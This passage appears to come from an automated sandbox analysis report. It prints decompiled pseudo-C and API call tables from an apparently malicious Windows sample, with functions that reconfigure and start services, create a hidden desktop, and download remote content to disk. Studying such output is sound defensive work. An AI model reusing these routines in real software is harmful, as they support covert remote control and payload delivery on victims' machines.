					_t14 = QueryServiceStatus(_t31,  &_v28);
					if(_v24 != 4 || _t14 == 0) {
						StartServiceW(_t31, _a12, _a8);
					}
					return 1;
				}
			}










                                                                                                        0x70983924
                                                                                                        0x7098392a
                                                                                                        0x709839e7
                                                                                                        0x70983930
                                                                                                        0x70983941
                                                                                                        0x7098394d
                                                                                                        0x7098394f
                                                                                                        0x70983958
                                                                                                        0x70983967
                                                                                                        0x7098396b
                                                                                                        0x70983979
                                                                                                        0x70983996
                                                                                                        0x70983996
                                                                                                        0x709839a6
                                                                                                        0x709839a6
                                                                                                        0x709839ad
                                                                                                        0x709839b4
                                                                                                        0x709839c0
                                                                                                        0x709839d1
                                                                                                        0x709839d1
                                                                                                        0x709839e0
                                                                                                        0x709839e0

                                                                                                        APIs
                                                                                                        • QueryServiceConfigW.ADVAPI32 ref: 70983949
                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,00000000,00000000), ref: 7098395A
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 70983961
                                                                                                        • QueryServiceConfigW.ADVAPI32(?,00000000,?,?), ref: 70983975
                                                                                                        • ChangeServiceConfigW.ADVAPI32(?,000000FF,00000002,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 70983996
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 7098399F
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 709839A6
                                                                                                        • QueryServiceStatus.ADVAPI32(?,?), ref: 709839B4
                                                                                                        • StartServiceW.ADVAPI32(?,?,?), ref: 709839D1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Service$Heap$ConfigQuery$Process$AllocChangeFreeStartStatus
                                                                                                        • String ID:
                                                                                                        • API String ID: 1115209516-0
                                                                                                        • Opcode ID: 593dd96af61de1ebce5e2cbaf76e92e7d022a28926e15ad201bc4061b2c55eb2
                                                                                                        • Instruction ID: 6405523034b53891feb1dec1df36d40566e3a63ad90ff5354d217acd5e901cb5
                                                                                                        • Opcode Fuzzy Hash: 593dd96af61de1ebce5e2cbaf76e92e7d022a28926e15ad201bc4061b2c55eb2
                                                                                                        • Instruction Fuzzy Hash: BB11A2B2218300EBD6105B95CC49F6F7BBCAB84B64F504629F556D63D0D6B1D8009B63
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 7098A0B0, Relevance: 13.6, APIs: 9, Instructions: 71windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 85%
                                                                                                        			E7098A0B0(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t5;
				void* _t15;
				WCHAR* _t16;
				intOrPtr _t23;
				struct HWND__* _t27;

				_t5 = _a8;
				if(_t5 == 0) {
					_t27 = _a4;
					SetWindowLongW(_t27, 0xffffffec, GetWindowLongW(_t27, 0xffffffec) | 0x00000008);
					SetWindowPos(_t27, 0xffffffff, 0, 0, 0, 0, 3);
					BringWindowToTop(_t27);
					SetForegroundWindow(_t27);
					SendMessageW(_t27, 0x473, 1, 1);
					SendMessageW(_t27, 0x46f, 8, 0);
					goto L7;
				} else {
					_t15 = _t5 - 2;
					if(_t15 == 0) {
						_t23 =  *0x7098f6cc; // 0x0
						_push(0);
						_push(0);
						_push(0);
						_t16 = StrChrW(0x7098caf4, 0x63);
						if(E709844E0(StrChrW(0x7098cec0, 0x72), _t16, _t23) != 0) {
							goto L7;
						} else {
							return 1;
						}
					} else {
						if(_t15 != 0x83f0) {
							L7:
							return 0;
						} else {
							 *0x7098f6cc = _a12;
							return 0;
						}
					}
				}
			}








                                                                                                        0x7098a0b4
                                                                                                        0x7098a0b8
                                                                                                        0x7098a115
                                                                                                        0x7098a12a
                                                                                                        0x7098a13d
                                                                                                        0x7098a144
                                                                                                        0x7098a14b
                                                                                                        0x7098a161
                                                                                                        0x7098a16d
                                                                                                        0x00000000
                                                                                                        0x7098a0ba
                                                                                                        0x7098a0ba
                                                                                                        0x7098a0bd
                                                                                                        0x7098a0d9
                                                                                                        0x7098a0e5
                                                                                                        0x7098a0e7
                                                                                                        0x7098a0e9
                                                                                                        0x7098a0f3
                                                                                                        0x7098a10a
                                                                                                        0x00000000
                                                                                                        0x7098a10c
                                                                                                        0x7098a112
                                                                                                        0x7098a112
                                                                                                        0x7098a0bf
                                                                                                        0x7098a0c4
                                                                                                        0x7098a170
                                                                                                        0x7098a173
                                                                                                        0x7098a0ca
                                                                                                        0x7098a0ce
                                                                                                        0x7098a0d6
                                                                                                        0x7098a0d6
                                                                                                        0x7098a0c4
                                                                                                        0x7098a0bd

                                                                                                        APIs
                                                                                                        • StrChrW.SHLWAPI(7098CAF4,00000063,00000000,00000000,00000000,00000000,00000000,7098A4CC,00000000,000083F2,00000000,00000000,00000000,00000000,000000C8,?), ref: 7098A0F3
                                                                                                        • StrChrW.SHLWAPI(7098CEC0,00000072,00000000), ref: 7098A0FD
                                                                                                        • GetWindowLongW.USER32(00000000,000000EC), ref: 7098A11D
                                                                                                        • SetWindowLongW.USER32 ref: 7098A12A
                                                                                                        • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 7098A13D
                                                                                                        • BringWindowToTop.USER32(00000000), ref: 7098A144
                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 7098A14B
                                                                                                        • SendMessageW.USER32(00000000,00000473,00000001,00000001), ref: 7098A161
                                                                                                        • SendMessageW.USER32(00000000,0000046F,00000008,00000000), ref: 7098A16D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Window$LongMessageSend$BringForeground
                                                                                                        • String ID:
                                                                                                        • API String ID: 4108379202-0
                                                                                                        • Opcode ID: 0cfe039ba70c1ed00411272ed5fcb25f064313c71227ba3502da14e70028866d
                                                                                                        • Instruction ID: 5a180a23d6203845036094df1a185a1e7a9974792fa6d5e1b75ab8dfef6dbcbc
                                                                                                        • Opcode Fuzzy Hash: 0cfe039ba70c1ed00411272ed5fcb25f064313c71227ba3502da14e70028866d
                                                                                                        • Instruction Fuzzy Hash: 08110D7335C3107BF2205B659C0AF4F3658DB81B21F204216F702FA3E1D7B4690197A6
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709832A0, Relevance: 13.6, APIs: 9, Instructions: 64memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 58%
                                                                                                        			E709832A0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v0;
				void* _t22;
				void* _t29;
				signed int _t31;

				_t31 = 0;
				_t22 = HeapAlloc(GetProcessHeap(), 8, 0x1000);
				if(_t22 != 0) {
					_push(2);
					_push(_a12);
					_push(_a8);
					_push(_a4);
					_v0 = wsprintfW(_t22, StrChrW(0x7098c664, 0x25));
					_t29 = E7098A7A0(_t22, 0, 0);
					if(_t29 != 0) {
						_t31 = RtlComputeCrc32(0, _t29, _v0) % 0xffffff7f;
						asm("bswap esi");
						HeapFree(GetProcessHeap(), 0, _t29);
					}
					HeapFree(GetProcessHeap(), 0, _t22);
				}
				return _t31;
			}







                                                                                                        0x709832b1
                                                                                                        0x709832bc
                                                                                                        0x709832c0
                                                                                                        0x709832cf
                                                                                                        0x709832d1
                                                                                                        0x709832d2
                                                                                                        0x709832d3
                                                                                                        0x709832ec
                                                                                                        0x709832f5
                                                                                                        0x709832fc
                                                                                                        0x70983316
                                                                                                        0x70983318
                                                                                                        0x7098331d
                                                                                                        0x7098331d
                                                                                                        0x70983329
                                                                                                        0x7098332f
                                                                                                        0x70983336

                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00001000,00000100,00000000,00000000,00A599F8,709890B4,00A521E0,00A599F8,00A44520,00A4B6C8,00000001,7098F3C8,00000008), ref: 709832B3
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 709832B6
                                                                                                        • StrChrW.SHLWAPI(7098C664,00000025,?,?,?,00000002,77E34620), ref: 709832DB
                                                                                                        • wsprintfW.USER32 ref: 709832E3
                                                                                                          • Part of subcall function 7098A7A0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,77E34620,00000000,74B04F20,00000000,709832F5,00000000,00000000,00000000), ref: 7098A7C1
                                                                                                          • Part of subcall function 7098A7A0: GetProcessHeap.KERNEL32(00000008,00000001), ref: 7098A7D3
                                                                                                          • Part of subcall function 7098A7A0: HeapAlloc.KERNEL32(00000000), ref: 7098A7DA
                                                                                                          • Part of subcall function 7098A7A0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 7098A7EE
                                                                                                        • RtlComputeCrc32.NTDLL ref: 70983305
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 7098331A
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 7098331D
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 70983326
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70983329
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Heap$Process$AllocByteCharFreeMultiWide$ComputeCrc32wsprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 1190661824-0
                                                                                                        • Opcode ID: 304578db4fd0ab926957ee3c89808b77de685711e1b9c537efa985b2238300f3
                                                                                                        • Instruction ID: 500bce39f32e844228f553e2976015c552f02aa0c8d69990b1afaffb710f147e
                                                                                                        • Opcode Fuzzy Hash: 304578db4fd0ab926957ee3c89808b77de685711e1b9c537efa985b2238300f3
                                                                                                        • Instruction Fuzzy Hash: A401A1F26143017FE2009BA68C4DF6F7AACDBC5A61F10452AB616833D0DAB4DC0186B2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 7098A020, Relevance: 13.5, APIs: 9, Instructions: 43threadsleepsynchronizationCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E7098A020() {
				void* _v0;
				struct HDESK__* _t3;
				struct HDESK__* _t10;
				void* _t12;

				_t3 = GetThreadDesktop(GetCurrentThreadId());
				 *0x7098f534 = _t3;
				if(_t3 != 0) {
					_t3 = CreateDesktopW(StrChrW(0x7098cad4, 0x54), 0, 0, 0, 0x10000000, 0);
					 *0x7098f530 = _t3;
					if(_t3 != 0) {
						_t12 = CreateThread(0, 0, E70989B10, _v0, 0, 0);
						if(_t12 != 0) {
							WaitForSingleObject(_t12, 0xffffffff);
							CloseHandle(_t12);
							Sleep(0xfa0);
						}
						_t10 =  *0x7098f530; // 0x0
						return CloseDesktop(_t10);
					}
				}
				return _t3;
			}







                                                                                                        0x7098a027
                                                                                                        0x7098a02d
                                                                                                        0x7098a034
                                                                                                        0x7098a051
                                                                                                        0x7098a057
                                                                                                        0x7098a05e
                                                                                                        0x7098a079
                                                                                                        0x7098a07d
                                                                                                        0x7098a082
                                                                                                        0x7098a089
                                                                                                        0x7098a094
                                                                                                        0x7098a094
                                                                                                        0x7098a09a
                                                                                                        0x00000000
                                                                                                        0x7098a0a7
                                                                                                        0x7098a05e
                                                                                                        0x7098a0a8

                                                                                                        APIs
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 7098A020
                                                                                                        • GetThreadDesktop.USER32(00000000), ref: 7098A027
                                                                                                        • StrChrW.SHLWAPI(7098CAD4,00000054,00000000,00000000,00000000,10000000,00000000), ref: 7098A04A
                                                                                                        • CreateDesktopW.USER32 ref: 7098A051
                                                                                                        • CreateThread.KERNEL32 ref: 7098A073
                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 7098A082
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 7098A089
                                                                                                        • Sleep.KERNEL32(00000FA0), ref: 7098A094
                                                                                                        • CloseDesktop.USER32(00000000), ref: 7098A0A1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: DesktopThread$CloseCreate$CurrentHandleObjectSingleSleepWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 4135746217-0
                                                                                                        • Opcode ID: 0b3a4d16cd3d774f42bc1005fa77568ecc4bb130b7cfea15eb456c5ec1540f4f
                                                                                                        • Instruction ID: 62f3462cec0b9ac1a05d5e17840ae4b1c52dd2c4019f16a062dee29cc7836fc3
                                                                                                        • Opcode Fuzzy Hash: 0b3a4d16cd3d774f42bc1005fa77568ecc4bb130b7cfea15eb456c5ec1540f4f
                                                                                                        • Instruction Fuzzy Hash: 740186B326D7027BF2205F76AC5DF593668AB06B06F304129FB02E53D0DB70E401AB15
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004E1A9C, Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 457COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004E1AB8
                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,00506D47,PingThread,00000000,00000068), ref: 004A1B28
                                                                                                          • Part of subcall function 0050E96A: __EH_prolog3.LIBCMT ref: 0050E971
                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,00506D61,?,PingThread,00000000,00000068), ref: 004A17DC
                                                                                                          • Part of subcall function 004BF3A9: __EH_prolog3.LIBCMT ref: 004BF3CB
                                                                                                          • Part of subcall function 004B94E7: __EH_prolog3.LIBCMT ref: 004B94F5
                                                                                                          • Part of subcall function 004E177C: __EH_prolog3.LIBCMT ref: 004E179B
                                                                                                          • Part of subcall function 004E177C: GetModuleFileNameW.KERNEL32(00000000,?,00000104,0000000C), ref: 004E17CE
                                                                                                          • Part of subcall function 004E177C: PathRemoveFileSpecW.SHLWAPI(?), ref: 004E17DB
                                                                                                          • Part of subcall function 004E177C: _wcscat_s.LIBCMT ref: 004E17FA
                                                                                                          • Part of subcall function 004E177C: _memset.LIBCMT ref: 004E1818
                                                                                                          • Part of subcall function 004E177C: GetPrivateProfileStringW.KERNEL32(Installation,INSTEXE,0077C1F8,?,00000100,?), ref: 004E183F
                                                                                                          • Part of subcall function 004A17E8: __EH_prolog3.LIBCMT ref: 004A17EF
                                                                                                          • Part of subcall function 004A17E8: InitializeCriticalSection.KERNEL32(?,00000004,00506D6D,?,?,PingThread,00000000,00000068), ref: 004A1804
                                                                                                          • Part of subcall function 004C125C: __EH_prolog3.LIBCMT ref: 004C1263
                                                                                                          • Part of subcall function 004C1A4B: __EH_prolog3.LIBCMT ref: 004C1A52
                                                                                                          • Part of subcall function 0040D53A: char_traits.LIBCPMT ref: 0040D55F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$CriticalSection$FileInitialize$DeleteModuleNamePathPrivateProfileRemoveSpecString_memset_wcscat_schar_traits
                                                                                                        • String ID: - $ExeInfo$MAC$MC.Reg $MC.Register.Failed$Reg
                                                                                                        • API String ID: 2142787985-157867029
                                                                                                        • Opcode ID: 8ce18d035badd79214ad706defd3d76e85cdbea3099cf23f36413dc66e71c593
                                                                                                        • Instruction ID: 931cd102a136e8241c5f311e7206260e69e1ff52e66e5f491b3fa25d9f698058
                                                                                                        • Opcode Fuzzy Hash: 8ce18d035badd79214ad706defd3d76e85cdbea3099cf23f36413dc66e71c593
                                                                                                        • Instruction Fuzzy Hash: 1412E27080118CEADB11EBA4CD95FED7BB8AF22308F14819EF40667192DB781F48DB65
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004C829D, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 004C82A4
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004C82D1
                                                                                                        • RevertToSelf.ADVAPI32(?,0083E5AC,?,?), ref: 004C8329
                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,00506D47,PingThread,00000000,00000068), ref: 004A1B28
                                                                                                          • Part of subcall function 004378AA: __EH_prolog3.LIBCMT ref: 004378B1
                                                                                                        • GetLastError.KERNEL32(00000000,?,00000064,004C57DB), ref: 004C83AB
                                                                                                        • CloseHandle.KERNEL32(00000001,?,00000064,004C57DB), ref: 004C841B
                                                                                                        Strings
                                                                                                        • ImpersonateUser: RevertToSelf failed, xrefs: 004C833D
                                                                                                        • ImpersonateUser: UnLoadUserProfile failed with error , xrefs: 004C83BF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.509744756.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.509650373.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515742168.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515756354.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515787319.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515804863.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.515815619.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516318953.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.516679484.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517321522.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.517911473.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518414023.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518531967.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518553264.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518570449.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.518790814.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3$CloseCriticalCurrentErrorHandleInitializeLastRevertSectionSelfThread
                                                                                                        • String ID: ImpersonateUser: RevertToSelf failed$ImpersonateUser: UnLoadUserProfile failed with error
                                                                                                        • API String ID: 3949952964-1656220962
                                                                                                        • Opcode ID: 4138ac09e909aef1d4801300f1e4e28c40d846997b7939754234ce5d2353344a
                                                                                                        • Instruction ID: c5a483f6a84fb0c669df827afa7862ad503414c6e7d590abcc356b186abaa6fe
                                                                                                        • Opcode Fuzzy Hash: 4138ac09e909aef1d4801300f1e4e28c40d846997b7939754234ce5d2353344a
                                                                                                        • Instruction Fuzzy Hash: 7751E471C00289DEDB25EFA4CD55AEEBBB4BF14304F14446EE042632A2EB395A04CB59
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70985DF0, Relevance: 12.1, APIs: 8, Instructions: 81networkfileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E70985DF0() {
				WCHAR* _v16;
				WCHAR* _v36;
				void* _v1048;
				void _v1068;
				long _v1076;
				long _v1080;
				void _v1084;
				void* _v1088;
				long _v1092;
				long _v1096;
				WCHAR* _t13;
				long _t23;
				void* _t27;
				long _t33;
				void* _t36;
				void* _t38;

				_t13 =  *0x7098f5c8; // 0xa4cec0
				_t33 = 0;
				_t38 = InternetOpenW(_t13, 0, 0, 0, 0);
				_v1048 = _t38;
				if(_t38 != 0) {
					_t27 = InternetOpenUrlW(_t38, _v16, 0, 0, 0x846a0000, 0);
					if(_t27 != 0) {
						_t36 = CreateFileW(_v36, 0x40000000, 0, 0, 2, 0x80, 0);
						if(_t36 != 0xffffffff) {
							_v1080 = 0;
							_v1076 = 0;
							do {
								if(InternetReadFile(_t27,  &_v1068, 0x400,  &_v1080) == 0) {
									goto L7;
								} else {
									_t23 = _v1096;
									if(_t23 != 0) {
										WriteFile(_t36,  &_v1084, _t23,  &_v1092, 0);
										goto L7;
									}
								}
								break;
								L7:
							} while (_v1096 > 0);
							_t33 = 1;
							CloseHandle(_t36);
							_t38 = _v1088;
						}
						InternetCloseHandle(_t27);
					}
					InternetCloseHandle(_t38);
				}
				return _t33;
			}



















                                                                                                        0x70985df6
                                                                                                        0x70985dfd
                                                                                                        0x70985e0a
                                                                                                        0x70985e0c
                                                                                                        0x70985e12
                                                                                                        0x70985e30
                                                                                                        0x70985e34
                                                                                                        0x70985e58
                                                                                                        0x70985e5d
                                                                                                        0x70985e65
                                                                                                        0x70985e69
                                                                                                        0x70985e73
                                                                                                        0x70985e87
                                                                                                        0x00000000
                                                                                                        0x70985e89
                                                                                                        0x70985e89
                                                                                                        0x70985e8f
                                                                                                        0x70985e9f
                                                                                                        0x00000000
                                                                                                        0x70985e9f
                                                                                                        0x70985e8f
                                                                                                        0x00000000
                                                                                                        0x70985ea1
                                                                                                        0x70985ea1
                                                                                                        0x70985ea9
                                                                                                        0x70985eae
                                                                                                        0x70985eb4
                                                                                                        0x70985eb4
                                                                                                        0x70985eb9
                                                                                                        0x70985ebf
                                                                                                        0x70985ec1
                                                                                                        0x70985ec7
                                                                                                        0x70985ed2

                                                                                                        APIs
                                                                                                        • InternetOpenW.WININET(00A4CEC0,00000000,00000000,00000000,00000000), ref: 70985E04
                                                                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,846A0000,00000000), ref: 70985E2A
                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000), ref: 70985E52
                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 70985E83
                                                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 70985E9F
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 70985EAE
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 70985EB9
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 70985EC1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.551730997.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.551712171.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551756124.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551776083.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000004.00000002.551813080.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Internet$CloseFileHandle$Open$CreateReadWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 2705228764-0
                                                                                                        • Opcode ID: 7ca887efced570d636381274316917638ddc7702dd1b0d56056dcb29fbf16b73
                                                                                                        • Instruction ID: 9d4d59fc755c0ee5f6936d72e6f075502eb1a80e688924fd82ad8e516146b1e8
                                                                                                        • Opcode Fuzzy Hash: 7ca887efced570d636381274316917638ddc7702dd1b0d56056dcb29fbf16b73
                                                                                                        • Instruction Fuzzy Hash: E621A4B2118341BFD3109F56CC48FAB7ABCEBC9B11F10092DB61292391D770D909C7A2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70983CB0, Relevance: 12.1, APIs: 8, Instructions: 67memoryregistrythreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 70%
                                                                                                        			E70983CB0(intOrPtr* _a8) {
				struct _SERVICE_STATUS* _v4;
				int _v8;
				WCHAR* _t9;
				int _t10;
				void* _t13;
				int _t14;
				signed int _t18;
				short* _t20;
				int _t21;
				void _t22;
				void* _t23;
				void* _t26;
				intOrPtr* _t27;
				void* _t30;

				_t9 =  *0x7098f5cc; // 0xa4b6c8
				_t10 = SetCurrentDirectoryW(_t9);
				_t27 = _a8;
				 *0x7098f4ec = 0x20;
				 *0x7098f4f0 = 2;
				 *0x7098f4f4 = 0x85;
				 *0x7098f4f8 = 0;
				 *0x7098f4fc = 0;
				 *0x7098f500 = 0;
				 *0x7098f504 = 0;
				__imp__RegisterServiceCtrlHandlerExW( *_t27, E70983BC0, 0, _t23, _t26);
				 *0x7098f3c4 = _t10;
				if(_t10 == 0) {
					 *0x7098f4f0 = 1;
					SetServiceStatus(0, 0x7098f4ec);
					ExitProcess(0);
				}
				_t21 = _v8;
				 *0x7098f4f0 = 4;
				_t30 = _t21 - 1;
				if(_t30 <= 0) {
					L7:
					_t13 = HeapAlloc(GetProcessHeap(), 8, 4);
					if(_t13 != 0) {
						_t22 =  *0x7098f598; // 0x1
						 *_t13 = _t22;
						CloseHandle(CreateThread(0, 0, E70983A80, _t13, 0, 0));
					}
					L9:
					_v4 = 0x7098f4ec;
					_t14 =  *0x7098f3c4; // 0x0
					_v8 = _t14;
					return SetServiceStatus(??, ??);
				}
				_t18 = 1;
				if(_t30 <= 0) {
					goto L7;
				} else {
					while(1) {
						_t20 =  *((intOrPtr*)(_t27 + _t18 * 4));
						if( *_t20 == 0x73 &&  *((intOrPtr*)(_t20 + 2)) == 0) {
							goto L9;
						}
						_t18 = _t18 + 1;
						if(_t18 < _t21) {
							continue;
						}
						goto L7;
					}
					goto L9;
				}
			}

















                                                                                                        0x70983cb0
                                                                                                        0x70983cb8
                                                                                                        0x70983cbe
                                                                                                        0x70983cc5
                                                                                                        0x70983ccf
                                                                                                        0x70983cd9
                                                                                                        0x70983ce3
                                                                                                        0x70983ce9
                                                                                                        0x70983cef
                                                                                                        0x70983cf5
                                                                                                        0x70983d03
